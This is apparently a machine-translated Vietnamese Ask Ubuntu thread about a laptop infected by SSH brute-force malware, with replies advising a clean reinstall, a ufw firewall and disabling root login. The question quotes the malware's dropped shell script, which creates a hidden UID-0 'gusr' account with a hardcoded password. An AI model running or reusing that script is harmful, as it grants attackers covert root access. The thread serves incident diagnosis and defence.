Làm thế nào để đối phó với phần mềm độc hại trên máy tính xách tay của tôi?

12

Tôi khá chắc chắn rằng máy tính xách tay Ubuntu 13.10 của tôi bị nhiễm một số loại phần mềm độc hại.

Thỉnh thoảng, tôi thấy một tiến trình / lib / sshd (thuộc sở hữu của root) đang chạy và tiêu thụ rất nhiều cpu. Nó không phải là máy chủ sshd chạy / usr / sbin / sshd.

Nhị phân có quyền --wxrw-rwt và nó tạo và sinh ra các tập lệnh trong thư mục / lib. Một cái gần đây được đặt tên là 13959730401387633604 và nó thực hiện như sau

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

Người dùng gusr được tạo ra bởi phần mềm độc hại một cách độc lập và sau đó chpasswd bị treo trong khi tiêu thụ 100% cpu.

Cho đến nay, tôi đã xác định rằng người dùng gusr đã được thêm vào các tệp trong / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

Có vẻ như phần mềm độc hại đã tạo các bản sao của tất cả các tệp này với hậu tố "-". Danh sách đầy đủ của / etc / tập tin đã được sửa đổi bởi root có sẵn ở đây .

Ngoài ra, tập tin / etc / hosts đã được thay đổi thành cái này .

/ Lib / sshd bắt đầu bằng cách thêm chính nó vào cuối tập tin /etc/init.d/rc.local!

Tôi đã xóa người dùng, xóa các tệp, giết cây xử lý, thay đổi mật khẩu của tôi và xóa các khóa công khai ssh.

Tôi biết rằng về cơ bản tôi đã bị lừa, và rất có thể tôi sẽ cài đặt lại toàn bộ hệ thống. Tuy nhiên, vì tôi đăng nhập vào một số máy khác, nên ít nhất là cố gắng loại bỏ nó và tìm hiểu làm thế nào tôi có được nó. Bất kỳ đề xuất về cách đi về điều này sẽ được đánh giá cao.

Có vẻ như họ đã nhận được vào ngày 25 tháng 3 bằng cách đăng nhập root bắt buộc. Tôi không biết rằng root ssh được bật theo mặc định trong Ubuntu. Tôi vô hiệu hóa nó và đưa lên denyhosts.

Đăng nhập là từ 59.188.247.236, một nơi nào đó ở Hồng Kông rõ ràng.

Tôi đã nhận được máy tính xách tay từ EmperorLinux và họ cho phép truy cập root. Nếu bạn có một trong số đó và bạn đang chạy sshd hãy cẩn thận.

security  malware 
Dejan Jovanović
nguồn
2
Nhận máy của bạn TẮT mạng! Hiện nay!
Seth
2
Và tại sao bạn đã kích hoạt đăng nhập root? Đó là điều bạn không nên kích hoạt mà không có lý do chính đáng.
Seth
@ Vì tôi không kích hoạt nó, nó được bật theo mặc định trong Ubuntu. Tôi cũng ngạc nhiên như bạn.
Dejan Jovanović
1
Xem " Theo mặc định, trình nền SSH có bật đăng nhập gốc từ xa. Thông thường Ubuntu không cho phép truy cập trực tiếp vào người dùng root, vì vậy cài đặt này không quan trọng. Nếu bạn đã đặt mật khẩu trên tài khoản root, cài đặt này có thể là một tiềm năng rủi ro bảo mật và nên bị vô hiệu hóa. "
Seth
1
Tôi khá chắc chắn rằng điều này là không Linux/Ebury. Đó là một cái gì đó khác, và có thể không có tên được gán. Ebury sẽ không tạo tài khoản người dùng mới và sẽ sửa đổi thư viện dùng chung được sử dụng bởi openssh, không bị bỏ trong một nhị phân mới có tên sshd.
Đi xe đạp

Câu trả lời:

11

Đầu tiên, lấy máy đó ra khỏi mạng ngay!

Thứ hai, tại sao bạn đã kích hoạt tài khoản root? Bạn thực sự không nên kích hoạt tài khoản root trừ khi bạn có lý do rất chính đáng để làm như vậy.

Thứ ba, vâng, cách duy nhất để chắc chắn rằng bạn sạch sẽ là cài đặt sạch. Chúng tôi cũng khuyên bạn nên bắt đầu mới và không quay lại bản sao lưu, vì bạn không bao giờ có thể chắc chắn khi nào tất cả bắt đầu.

Tôi cũng đề nghị bạn nên thiết lập một tường lửa trong lần cài đặt tiếp theo và từ chối tất cả các kết nối đến: 

sudo ufw default deny incoming

và sau đó cho phép ssh với: 

sudo ufw allow ssh

và KHÔNG cho phép tài khoản root! Chắc chắn đảm bảo rằng đăng nhập ssh gốc bị vô hiệu hóa.

Seth
nguồn
4
Tôi đã kiểm tra tài khoản root. Tôi đã nhận được máy tính xách tay từ Emperorlinux và họ đã kích hoạt tài khoản để thiết lập nó. Ngốc nghếch.
Dejan Jovanović
1
@ DejanJovanović Thật là khủng khiếp!
Seth
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.